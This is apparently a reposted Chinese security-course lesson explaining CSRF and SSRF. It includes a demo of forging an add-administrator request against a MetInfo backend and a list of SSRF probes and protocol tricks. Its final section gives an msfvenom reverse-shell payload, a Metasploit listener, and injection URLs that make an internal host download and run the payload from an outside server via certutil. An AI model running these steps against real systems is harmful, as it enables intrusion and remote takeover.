当前位置:   article > 正文

day39WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

day39WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用
本章知识点:
1 CSRF- 原理 & 危害 & 探针 & 利用等
2 SSRF- 原理 & 危害 & 探针 & 利用等
3 CSRF&SSRF- 黑盒下漏洞探针点
配套资源(百度网盘)
  1. 链接:https://pan.baidu.com/s/12lgCkfMj-YNc-uGSfMGSZg?pwd=37eo
  2. 提取码:37eo

CSRF-原理&后台自动添加管理员

漏洞原理

CSRF 全称: Cross-site request forgery ,即,跨站请求伪造,也被称为 “One Click Attack” 或 “Session Riding” ,通常缩写为 CSRF 或者 XSRF ,是一种对网站的恶意利用。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但 自己的 qq 号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义伪造请求,执行恶意操作,具有很大的危害性。

CSRF 的攻击过程两个条件:
1 、目标用户已经登录了网站,能够执行网站的功能。
2 、目标用户访问了攻击者构造的 URL
CSRF 安全问题黑盒怎么判断:
1 、看验证来源不 - 修复
就是判断网站是否采取同源策略,就是判断网站会不会判断数据包的来源,将某个功能的链接复制在别的地方访问,如果能够出现对应的功能页面就说明没有同源策略,也就存在CSRF攻击的可能性。
2 、看凭据有无 token-- 修复
什么是token,就是一个操作对应的标识,可以通过token值来判断操作是否合理,黑盒测试可以通过抓包看否有token值,如果有token就可以防御CSRF了。
3 、看关键操作有无验证 - 修复
比如验证码之类的
CSRF 安全问题白盒怎么审计:
同黑盒思路一样,代码中分析上述三看

案例说明:

小迪在登录后台管理自己网站的时候,突然群里给小迪说阿祖又说爱上别人了,随后给我发了个 URL 链接,小迪直接点了进去, GG
小迪的网站: http://test.xiaodi8.com/
发送的 URL http://47.94.236.117/add.html

利用流程:

1 、获取目标的触发数据包(通过前期信息收集获取网站搭建服务器以及源码,然后尝试复原)
2 、利用 CSRFTester 构造导出
3 、诱使受害者访问特定地址触发

案例演示

搭建metinfo网站(源码配套资源里面有,下载用phpstudy搭建即可)
搭建好之后就进入管理员后台

 现在我们添加管理员,然后用CSRFTester抓取数据包并导出为html(对应工具配套资源里面有)

配置好浏览器代理,本地ip,端口为8008,打开CSRFTester,点击start开始抓包

数据包保存到本机桌面,然后打开将不需要的数据删除

将修改后的html数据包放到远程服务器上面,创建一个链接

这时候管理员用户界面只有两个用户

 现在我们在地址栏访问刚刚我们构建的数据包链接,回车发现多了一个用户

 这就是CSRF的基本攻击过程,黑客通过前期的信息收集获取到你网站的框架源码,然后用相同的环境搭建网站,通过模拟添加用户获取数据包(这个数据包和你的网站数据包一致),然后构造链接,在你登入到后台的时候,通过一切办法让你点击链接,然后你的后台就不知不觉的新建了一个管理员,黑客就可以通过自己新建的管理员登入到你的后台。

SSRF-原理&服务&协议&内网&漏洞

 漏洞原理

 SSRF(Server-Side Request Forgery: 服务器端请求伪造 ) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定地址的图片,下载等等。
SSRF 黑盒可能出现的地方:
1. 社交分享功能:获取超链接的标题等内容进行显示
2. 转码服务:通过 URL 地址把原地址的网页内容调优使其适合手机屏幕浏览
3. 在线翻译:给网址翻译对应网页的内容
4. 图片加载 / 下载:例如富文本编辑器中的点击下载图片到本地;通过 URL 地址加载或下
载图片
5. 图片 / 文章收藏功能:主要其会取 URL 地址中 title 以及文本的内容作为显示以求一
个好的用具体验
6. 云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的
信息,就可以进行 ssrf 测试  
7. 网站采集,网站抓取的地方:一些网站会针对你输入的 url 进行一些信息采集工作

 

案例说明:

小迪在本地创建了远程图片文件加载应用,直接被攻击者利用 SSRF 探针本
地及内网服务,并利用某漏洞直接获取到内网某主机的权限!
1 、服务探针:
http://127.0.0.1:8081/
http://127.0.0.1:3306/
2 、协议玩法:(更多玩法见图)
file:///D:/www.txt   通过file读取本地文件内容
dict://127.0.0.1:3306/info
ftp://192.168.46.148:21
3 、内网扫描:
http://192.168.46.148:8080
4 、漏洞利用:
- 生成: msfvenom -p windows/meterpreter/reverse_http
LHOST=47.94.236.117 LPORT=6688 -f exe -o xx.exe
- 监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 6688
run 
- 下载:
http://192.168.46.148:8080/?search==%00{.exec|cmd.exe%20/c%20cert
util%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.}
- 执行: http://192.168.46.148:8080/?search==%00{.exec|xx.exe.}

SSRF-某实际案例测试演示(功能点)

基于上述的 SSRF 的漏洞原理,漏洞探针开展黑盒思路分析那些可能存在

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/481933
推荐阅读
  

闽ICP备14008679号